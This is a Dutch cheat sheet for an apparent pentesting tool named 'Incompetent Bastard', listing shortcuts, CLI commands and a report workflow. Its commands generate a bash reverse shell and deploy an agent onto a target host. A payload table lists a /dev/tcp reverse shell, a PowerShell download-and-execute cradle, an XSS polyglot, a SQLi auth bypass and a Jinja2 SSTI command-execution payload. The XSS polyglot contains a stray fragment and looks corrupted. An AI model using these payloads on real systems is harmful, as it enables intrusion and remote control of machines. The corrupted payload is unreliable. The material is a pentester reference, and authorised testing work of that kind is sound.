IB Cheat Sheet
De meest gebruikte commando's en shortcuts van Incompetent Bastard op een rij.
Keyboard Shortcuts
| Shortcut | Actie |
| Ctrl+K | Zoeken in de Command Library |
| Ctrl+N | Nieuwe notitie |
| Ctrl+F | Nieuwe finding toevoegen |
| Ctrl+Shift+T | Nieuw terminal-tabblad |
Veelgebruikte Commando's
# Quick-add finding vanuit terminal
ib finding add --title "SQLi in login" --severity high --cvss 8.6
# Payload genereren
ib payload reverse-shell --type bash --lhost 10.0.0.1 --lport 4444
# Rapport exporteren
ib report generate --format pdf --project current
# Command library doorzoeken
ib search "kerberos"
# Agent deployen op doelmachine
ib agent deploy --target 10.0.0.5 --method smb
Payload Generator Referentie
| Type | Commando |
| Reverse Shell (Bash) | bash -i >& /dev/tcp/LHOST/LPORT 0>&1 |
| Reverse Shell (PowerShell) | IEX(New-Object Net.WebClient).DownloadString('http://LHOST/shell.ps1') |
| XSS Polyglot | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert() )//%0telerik; |
| SQLi Auth Bypass | ' OR 1=1-- - |
| SSTI (Jinja2) | {{config.__class__.__init__.__globals__['os'].popen('id').read()}} |
Rapport Workflow
- Findings toevoegen via Ctrl+F of de API
- CVSS 4.0 score berekenen per finding
- Screenshots en bewijs bijvoegen
- Rapport genereren: PDF, DOCX of LaTeX
- Review en verzenden